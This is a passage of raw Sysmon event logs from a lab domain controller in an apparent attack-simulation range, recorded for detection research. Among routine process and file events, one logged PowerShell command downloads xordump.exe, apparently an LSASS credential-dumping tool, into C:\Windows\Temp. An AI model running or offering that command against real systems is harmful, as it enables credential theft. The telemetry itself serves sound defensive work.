64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025169Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:05.006{4DB9351A-A32D-60D3-3F06-00000000CF01}7016C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c "echo "Python 3 must be installed manually"" C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025168Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.998{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025167Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:04.998{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025336Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.905{4DB9351A-A273-60D3-3C05-00000000CF01}6608ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\art-out.txtMD5=149051A423F9BF9BE55830BBDEC334E2,SHA256=00A849F83460016C81E181F0DD2177A73CCD4785107487A7B170DA033932F54A,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000025335Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:05.178{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61533-false10.0.1.12-8000- 23542300x800000000000000025334Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.795{4DB9351A-A32E-60D3-4A06-00000000CF01}3244ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025333Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.780{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2FD58F01C63EA920D2FD1F5F473F397C,SHA256=5AE570E2ABB20B5BFB8D40022C8AC63AD52FA8F6D84D92AD913698DC6AE57231,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025332Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.686{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A32E-60D3-4A06-00000000CF01}3244C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025331Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:06.670{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A32E-60D3-4A06-00000000CF01}3244C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025330Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:06.608{4DB9351A-9DDB-60D3-0B00-00000000CF01}628832C:\Windows\system32\lsass.exe{4DB9351A-A32E-60D3-4A06-00000000CF01}3244C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025329Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
17141700x800000000000000025374Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:07.420{4DB9351A-A32F-60D3-4C06-00000000CF01}2508\PSHost.132689562073410165.2508.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025373Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.405{4DB9351A-A32F-60D3-4C06-00000000CF01}2508ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_jck0jj03.sgh.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025372Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.405{4DB9351A-A32F-60D3-4C06-00000000CF01}2508ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_miqch3dd.sej.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025371Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.389{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_miqch3dd.sej.ps12021-06-23 21:10:07.389 10341000x800000000000000025370Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:07.373{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025369Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.342{4DB9351A-A273-60D3-3D05-00000000CF01}58325828C:\Windows\system32\conhost.exe{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025368Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:07.342{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1f3fffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+381e70|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2fa12e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2f8cd5|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c3b1e|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\cc732d30e6f14d29889113ae06e2408d\System.ni.dll+2c01f5|UNKNOWN(00007FFF5B97FD63) 10341000x800000000000000025367Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.327{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025366Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:07.327{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025365Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.327{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025364Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:07.327{4DB9351A-9DDD-60D3-0C00-00000000CF01}844876C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025363Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.327{4DB9351A-9E1D-60D3-8B00-00000000CF01}47086292C:\Windows\system32\csrss.exe{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000025362Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:07.327{4DB9351A-A273-60D3-3C05-00000000CF01}66084360C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.Pae3498d9#\ea1548159dd8b02b70895bbfe7ebabe3\Microsoft.PowerShell.Commands.Management.ni.dll+5970(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa995(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beaa7fc(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bf3392d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bea2a82(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9c982034(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be6802a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa
57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9becba9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9beadaab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bead93c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9be9e65c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\590a3504a0ae95b919078deb11475889\System.Management.Automation.ni.dll+9bedacff(wow64) 154100x800000000000000025361Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.341{4DB9351A-A32F-60D3-4C06-00000000CF01}2508C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXE"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" & {[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Invoke-WebRequest 
\""https://github.com/audibleblink/xordump/releases/download/v0.0.1/xordump.exe\"" -OutFile C:\Windows\Temp\xordump.exe} C:\Users\ADMINI~1\AppData\Local\Temp\ATTACKRANGE\Administrator{4DB9351A-9F2A-60D3-AB7C-0C0000000000}0xc7cab2HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 11241100x800000000000000025360Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.327{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-err.txt2021-06-23 21:09:49.615 11241100x800000000000000025359Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.327{4DB9351A-A273-60D3-3C05-00000000CF01}6608C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\ADMINI~1\AppData\Local\Temp\art-out.txt2021-06-23 21:09:49.615 23542300x800000000000000025358Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.311{4DB9351A-A32F-60D3-4B06-00000000CF01}3980ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025357Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:07.233{4DB9351A-9DDE-60D3-1600-00000000CF01}12921448C:\Windows\system32\svchost.exe{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025356Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.233{4DB9351A-9DDE-60D3-1600-00000000CF01}12921340C:\Windows\system32\svchost.exe{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000025355Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.202{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=420DF6D86CD96D553816769F4BA5F3C2,SHA256=A8CC5EE09A0AE93D7A01B530913DFE9D4A312FE14803723A945F5842AD0D15D4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000025354Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:10:07.186{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24c07|C:\Windows\system32\lsasrv.dll+25d4d|C:\Windows\system32\lsasrv.dll+24a85|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000025353Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.186{4DB9351A-9DDB-60D3-0B00-00000000CF01}628676C:\Windows\system32\lsass.exe{4DB9351A-A32F-60D3-4B06-00000000CF01}3980C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249cd|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 
17141700x800000000000000025352Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-CreatePipe2021-06-23 21:10:07.170{4DB9351A-A32F-60D3-4B06-00000000CF01}3980\PSHost.132689562070882307.3980.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 23542300x800000000000000025351Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.155{4DB9351A-A32F-60D3-4B06-00000000CF01}3980ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1surpvfh.jit.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000025350Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:10:07.155{4DB9351A-A32F-60D3-4B06-00000000CF01}3980ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_lbwacldr.o5k.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000025349Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 